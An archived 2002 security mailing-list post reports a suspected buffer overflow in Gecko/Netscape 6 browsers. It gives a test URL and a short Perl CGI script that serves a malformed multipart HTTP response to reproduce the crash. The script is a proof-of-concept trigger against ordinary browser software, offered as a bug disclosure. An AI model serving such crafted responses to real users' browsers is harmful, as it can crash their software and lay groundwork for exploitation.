[Mozilla Bug #131761] Buffer Overflow in Geck/Netscape 5.0/6.0?
From: Jonathan A. Zdziarski (jonathan@networkdweebs.com)Date: 03/18/02
- Previous message: Handle Nopman: "PHP-Nuke & Post-Nuke account hijacking."
- Next in thread: Scott Dier: "Re: Buffer Overflow in Geck/Netscape 5.0/6.0?"
- Reply: Scott Dier: "Re: Buffer Overflow in Geck/Netscape 5.0/6.0?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "Jonathan A. Zdziarski" <jonathan@networkdweebs.com> To: <frisco@blackant.net> Date: Mon, 18 Mar 2002 12:45:46 -0500
As requested by some of you, to reproduce this bug in an affected
browser, please visit:
http://www.networkdweebs.com:8080/cgi-bin/nph-test
This is a simple PERL script that will reproduce this error:
#!/usr/bin/perl
$|=1;
print <<_end;
HTTP/1.1 200
Content-type: multipart/mixed;boundary=BLAHBLAH
<HTML><BODY BGCOLOR=FFFFFF TEXT=000000 LINK=0088FF VLINK=FF88FF>
--BLAHBLAH
Content-type: text/html
_end
print <<_end;
<HTML><BODY BGCOLOR=FFFFFF TEXT=000000 LINK=0088FF VLINK=FF88FF>
_end
for(1..20) {
print "$_<BR>\n";
sleep 1;
}
- Previous message: Handle Nopman: "PHP-Nuke & Post-Nuke account hijacking."
- Next in thread: Scott Dier: "Re: Buffer Overflow in Geck/Netscape 5.0/6.0?"
- Reply: Scott Dier: "Re: Buffer Overflow in Geck/Netscape 5.0/6.0?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|